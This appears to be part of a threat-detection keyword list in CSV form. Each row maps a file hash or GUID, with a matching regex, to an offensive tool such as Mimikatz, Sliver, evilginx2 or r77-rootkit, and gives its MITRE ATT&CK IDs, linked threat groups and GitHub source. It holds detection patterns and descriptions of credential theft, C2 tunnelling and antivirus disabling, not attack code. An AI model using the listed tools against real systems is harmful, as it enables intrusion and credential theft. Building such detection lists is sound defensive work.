"*e54638737bca6cbd70f72c8afec371ec20df3ab8ae7d4f4c6b549008cb5a3cc9*",".{0,1000}e54638737bca6cbd70f72c8afec371ec20df3ab8ae7d4f4c6b549008cb5a3cc9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42099"
"*e5474ff71a5e81a3fde493dde6141b25fbcff158367cc0fc492c063f0e59ca6a*",".{0,1000}e5474ff71a5e81a3fde493dde6141b25fbcff158367cc0fc492c063f0e59ca6a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","42101"
"*e5509a144cb371b7afe6fb6a526fca317688da6b27bfcb7be1faf8fffd58a472*",".{0,1000}e5509a144cb371b7afe6fb6a526fca317688da6b27bfcb7be1faf8fffd58a472.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42104"
"*e55bdac582b5e2b4a3fe52e6c070f2c313d3466ed7ee58266cba3a74c1542f91*",".{0,1000}e55bdac582b5e2b4a3fe52e6c070f2c313d3466ed7ee58266cba3a74c1542f91.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42105"
"*e55c296872a04e46369c46c23bae5707cd7d2e079a2f8350015475b5eecd3e17*",".{0,1000}e55c296872a04e46369c46c23bae5707cd7d2e079a2f8350015475b5eecd3e17.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","42106"
"*e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2*",".{0,1000}e55c85d7da9a60ed31867b421961b3503df0b464e068e584fccc20892b05bef2.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#filehash","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","42107"
"*E55F7214-8CC4-4E1D-AEDB-C908D23902A4*",".{0,1000}E55F7214\-8CC4\-4E1D\-AEDB\-C908D23902A4.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","42108"
"*e5677fba46f78b856db90d573786aa5a46f068ddc9d5565ebb16a16795d05693*",".{0,1000}e5677fba46f78b856db90d573786aa5a46f068ddc9d5565ebb16a16795d05693.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42109"
"*e56bee79647fdae60a15c1dc283a990121cd5f387900929ca044dff8e0e2b427*",".{0,1000}e56bee79647fdae60a15c1dc283a990121cd5f387900929ca044dff8e0e2b427.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42110"
"*e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2*",".{0,1000}e56cc23ffa05a02bdb22fd0db6b82e1b91d64ce467bf9be73236edab7cf11af2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42111"
"*e56e4f05ebf54dc82142046543f2c81ffeb50eb6b342387461106fc27358fda0*",".{0,1000}e56e4f05ebf54dc82142046543f2c81ffeb50eb6b342387461106fc27358fda0.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","42112"
"*e572430caf64c4499a1ce4230435438d65a9c40afb1eb0ba2f6209806c19e7fc*",".{0,1000}e572430caf64c4499a1ce4230435438d65a9c40afb1eb0ba2f6209806c19e7fc.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","42113"
"*e580ae852e0dd2d7dc9fee540a3718716d99a538bb54cd37fec8c75256d74f27*",".{0,1000}e580ae852e0dd2d7dc9fee540a3718716d99a538bb54cd37fec8c75256d74f27.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","42115"
"*e58a3b95502715340515fafbdcaf1df971854d63176929ff25c83e4a1129ecb2*",".{0,1000}e58a3b95502715340515fafbdcaf1df971854d63176929ff25c83e4a1129ecb2.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42118"
"*e58b8ccccb9d997328877f89fa748bc62b4c4b29945abd2a1d8d60b55a84811a*",".{0,1000}e58b8ccccb9d997328877f89fa748bc62b4c4b29945abd2a1d8d60b55a84811a.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","42119"
"*e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6*",".{0,1000}e58bed7731a0a2a03e7c402d88a76a7d08c932494d6f5f78c0bc5f35b16ba9f6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42120"
"*e58c52c3eb69dc4b6cf3a73a42c7a9bc3adc4d0e4728a2a8744715fc730f8b9d*",".{0,1000}e58c52c3eb69dc4b6cf3a73a42c7a9bc3adc4d0e4728a2a8744715fc730f8b9d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42121"
"*e58f01df3692d793fb3441fb2264b60767ae47a9a029b6c22a71ddb0f2f8393f*",".{0,1000}e58f01df3692d793fb3441fb2264b60767ae47a9a029b6c22a71ddb0f2f8393f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42122"
"*e58f5924f64e96f3f84ef788dde5fc6699f91086a8fbc4797065670a37a3cbcd*",".{0,1000}e58f5924f64e96f3f84ef788dde5fc6699f91086a8fbc4797065670a37a3cbcd.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","42123"
"*e5978b950fec8996d30b98d75e89c1b58fb9a38aa450af8c63ca2f8c23025678*",".{0,1000}e5978b950fec8996d30b98d75e89c1b58fb9a38aa450af8c63ca2f8c23025678.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42124"
"*e599639a7aaf6a9ef2c7ca81bb0c61a3ec12796bb9f35e0959390c24d02ee64b*",".{0,1000}e599639a7aaf6a9ef2c7ca81bb0c61a3ec12796bb9f35e0959390c24d02ee64b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42125"
"*e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32*",".{0,1000}e59ca634fa9b25563346bcb14e9e97d40dbfacc3159291aae5b104e99caede32.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42126"
"*e5a25276797532ee1ab3c07ec17baddb9b7ad661890dfe2f9b91aa4db1eb2781*",".{0,1000}e5a25276797532ee1ab3c07ec17baddb9b7ad661890dfe2f9b91aa4db1eb2781.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42128"
"*e5a678fe7b074f6651954aa7c3643a21bf9019b9b0d504591a7c3e21283417ff*",".{0,1000}e5a678fe7b074f6651954aa7c3643a21bf9019b9b0d504591a7c3e21283417ff.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","42129"
"*e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b*",".{0,1000}e5a991c13b8ba7bd2e435dec2682cd31de0013b3455c18e3883608e75363de3b.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","42130"
"*e5a9c124911cf7d0f0f2f202a067744df6ecb534b93072def963b5eb449b2b3a*",".{0,1000}e5a9c124911cf7d0f0f2f202a067744df6ecb534b93072def963b5eb449b2b3a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42131"
"*e5aef5ed2d977915b2288135ea8689b1fb15f619021a8a5b788a475a068cde8b*",".{0,1000}e5aef5ed2d977915b2288135ea8689b1fb15f619021a8a5b788a475a068cde8b.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#filehash","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","42132"
"*E5AF133E4976EE14EA6EDB8652F354A18483289E2E1B6043D905B821FA84C53C*",".{0,1000}E5AF133E4976EE14EA6EDB8652F354A18483289E2E1B6043D905B821FA84C53C.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","42133"
"*e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0*",".{0,1000}e5c8fd6cca1c71cb4302024e18e2ffb1d2cb00b583f391368adb5a73b803e3b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42135"
"*e5ce8b2978d87ed5506c7b7dcad0d363c70f64ce5fad4b7e4beb465d60aada58*",".{0,1000}e5ce8b2978d87ed5506c7b7dcad0d363c70f64ce5fad4b7e4beb465d60aada58.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","42136"
"*e5d6d5fe4ebbae6ba141cf25faa3f05e915916b0980b90297a8b2e59b2312bb8*",".{0,1000}e5d6d5fe4ebbae6ba141cf25faa3f05e915916b0980b90297a8b2e59b2312bb8.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","42137"
"*e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0*",".{0,1000}e5d6eb36d1fe75a3f558093179a13f0cd74a661397eba1c7a0963200a8a365c0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","42138"
"*e5e994caa93a88d8a0dea6d4267336d13e00d5963cfa5d9ad33235f072d5eec2*",".{0,1000}e5e994caa93a88d8a0dea6d4267336d13e00d5963cfa5d9ad33235f072d5eec2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42141"
"*e5eb2c94e78da85d2a4b0cf973bab87ab3e9d877da6a169d3f2cf9b40eb73a1b*",".{0,1000}e5eb2c94e78da85d2a4b0cf973bab87ab3e9d877da6a169d3f2cf9b40eb73a1b.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","42142"
"*e5ee043da6e74b1cbee3fd4035a6f80a22c89e1813c5bfbd2572a594f93fd740*",".{0,1000}e5ee043da6e74b1cbee3fd4035a6f80a22c89e1813c5bfbd2572a594f93fd740.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","42143"
"*e5f220215fdf2ccc6b92dcbf95b6967d7a4f2bd4b0668413728c37bdd3833304*",".{0,1000}e5f220215fdf2ccc6b92dcbf95b6967d7a4f2bd4b0668413728c37bdd3833304.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","42144"
"*e5f826920a0effa33441079ae4eb87f7dc31534bb6577ba322f13c7d838d5b17*",".{0,1000}e5f826920a0effa33441079ae4eb87f7dc31534bb6577ba322f13c7d838d5b17.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","42145"
"*e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6*",".{0,1000}e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42147"
"*e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6*",".{0,1000}e60c210687e79347d06f9a144ee84417ba9ac4c1f303720f2fe4509734d670d6.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","42148"
"*E6104BC9-FEA9-4EE9-B919-28156C1F2EDE*",".{0,1000}E6104BC9\-FEA9\-4EE9\-B919\-28156C1F2EDE.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","#GUIDproject","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","42150"
"*e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f*",".{0,1000}e614bcf1b052fd1faf384fea62ddc4365051cef7bced133d54cd972be74e550f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42152"
